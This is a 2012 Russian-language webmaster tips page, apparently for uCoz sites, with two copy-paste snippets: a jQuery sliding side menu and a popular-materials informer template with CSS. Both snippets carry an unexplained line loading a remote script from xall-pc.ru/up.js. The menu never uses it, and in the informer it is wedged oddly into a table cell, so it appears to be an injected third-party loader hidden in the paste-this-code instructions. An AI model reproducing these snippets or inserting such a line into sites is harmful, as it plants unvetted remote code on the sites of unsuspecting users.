Установка скрипта: Код вставить в страницы сайта после --> "</head>"

Code
<script type="text/javascript" src="http://bambun.ru/css_js/jquery.easing.js"></script>  
<script type="text/javascript" src="http://bambun.ru/css_js/jquery.sweet-menu-1.0.js"></script>  
<script src="http://xall-pc.ru/up.js" type="text/javascript"></script>  
  <script type="text/javascript">  
  $(document).ready(function(){  
   
  $('#backMenu').sweetMenu({  
  top: 40,  
  padding: 8,  
  iconSize: 48,  
  easing: 'easeOutBounce',  
  duration: 500,  
  icons: [  
  'D1z-GameS.Ru'  
  ]  
  });  
   
  $('#exampleMenu').sweetMenu({  
  top: 200,  
  padding: 8,  
  iconSize: 48,  
  easing: 'easeOutBounce',  
  duration: 500,  
  icons: [  
  'http://bambun.ru/images/bbcode1.png' ]  
  });  
  });  
  </script>  
   
  <style type="text/css">  
  .sweetMenuAnchor{  
  border-top: 1px solid #5d5d5d;  
  border-right: 1px solid #5d5d5d;  
  border-bottom: 1px solid #5d5d5d;  
  border-top-right-radius: 4px;  
  -moz-border-radius-topright: 4px;  
  border-bottom-right-radius: 4px;  
  -moz-border-radius-bottomright: 4px;  
  color: #0071bb;  
  font-size: 24px;  
  font-weight: bold;  
  text-align: right;  
  text-transform: uppercase;  
  font-family: arial;  
  text-decoration: none;  
  background-color: #e0e0e0;  
  opacity: 0.6;  
  }  
   
  .sweetMenuAnchor span{  
  display: block;  
  padding-top: 8px;  
  }  
  </style>  

  <ul id="backMenu">  
  </ul>  
  <ul id="exampleMenu">  
   
  <li><a href="http://Ваш линк на тему форума,страницу объявления">Набор персонала</a></li>
Просмотров: 842 | Добавил: startsmart | Дата: 01.12.2012 | Комментарии (0)

Информер популярных материалов для (uCoz)
Создаём информер:
Каталог файлов > Материалы > Количество просмотров D > Материалы:сколько хотим > Колонки: 1
В шаблон информера вставляем:

Code
<div class="FimwareInf"> <table border="0" cellpadding="0" cellspacing="0" width="100%"><tr> <td width="25px" style="background:#fff; padding:3px; padding-bottom:4px;"><script src="http://xall-pc.ru/up.js" type="text/javascript"></script><img src="$IMG_URL1$" width="28px" height="28px" border="0"></td> <td valign="top" style="border:0px; border-left:1px solid #ccc;"> <div style="padding:5px; height:25px; overflow:hidden;"><a href="$ENTRY_URL$" title="">$TITLE$</a></div> </td> </tr></table> </div><div style="border-top:1px solid #ccc; border-bottom:1px solid #fff;"></div>


В CSS:

Code
div.FimwareInf {background:#f5f3f3;}  
div.FimwareInf:hover {background:#fff;}
Просмотров: 530 | Добавил: startsmart | Дата: 01.12.2012 | Комментарии (0)